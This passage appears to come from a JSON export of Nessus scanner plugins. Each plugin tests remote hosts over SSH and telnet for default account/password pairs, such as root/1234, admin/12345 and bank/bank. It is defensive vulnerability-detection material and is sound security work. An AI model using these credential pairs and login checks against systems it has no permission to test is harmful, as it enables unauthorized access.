(supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:07:32", "description": "The account 'admin' on the remote host has the default password '1111'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password '1111' for 'admin' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ADMIN_1111.NASL", "href": "https://www.tenable.com/plugins/nessus/94360", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"admin\";\npassword = \"1111\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94360);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password '1111' for 'admin' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default administrator\naccount.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'admin' on the remote host has the default password\n'1111'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:07:32", "description": "The account 'root' on the remote host has the default password 'system'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password 'system' for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_SYSTEM.NASL", "href": "https://www.tenable.com/plugins/nessus/94397", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"system\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94397);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password 'system' for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An administrative account on the remote host uses a known default\npassword.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the default password\n'system'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:07:33", "description": "The account 'root' on the remote host has the default password '00000000'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password '00000000' for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_00000000.NASL", "href": "https://www.tenable.com/plugins/nessus/94376", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"00000000\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94376);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password '00000000' for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An administrative account on the remote host uses a known default\npassword.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the default password\n'00000000'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:07:33", "description": "The account 'admin' on the remote host has the default password '12345'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password '12345' for 'admin' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ADMIN_12345.NASL", "href": "https://www.tenable.com/plugins/nessus/94363", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"admin\";\npassword = \"12345\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94363);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password '12345' for 'admin' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default administrator\naccount.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'admin' on the remote host has the default password\n'12345'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:08:03", "description": "The account 'guest' on the remote host has the default password '12345'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password '12345' for 'guest' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_GUEST_12345.NASL", "href": "https://www.tenable.com/plugins/nessus/94374", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"guest\";\npassword = \"12345\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94374);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password '12345' for 'guest' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with a default password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'guest' on the remote host has the default password\n'12345'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:08:03", "description": "The account 'root' on the remote host has the default password '54321'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password '54321' for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_54321.NASL", "href": "https://www.tenable.com/plugins/nessus/94381", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"54321\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94381);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password '54321' for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An administrative account on the remote host uses a known default\npassword.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the default password\n'54321'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:08:04", "description": "The account 'root' on the remote host has the default password '1234'.\nA remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password '1234' for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_1234.NASL", "href": "https://www.tenable.com/plugins/nessus/94378", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"1234\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94378);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password '1234' for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An administrative account on the remote host uses a known default\npassword.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the default password '1234'.\nA remote attacker can exploit this issue to gain administrative access\nto the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:39:41", "description": "The account 'bank' on the remote host has the default password 'bank'.\nAn attacker may leverage this issue to gain access to the affected system and launch further attacks against it.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2008-09-04T00:00:00", "type": "nessus", "title": "Default Password (bank) for 'bank' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_BANK_BANK.NASL", "href": "https://www.tenable.com/plugins/nessus/34082", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"bank\";\npassword = \"bank\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif 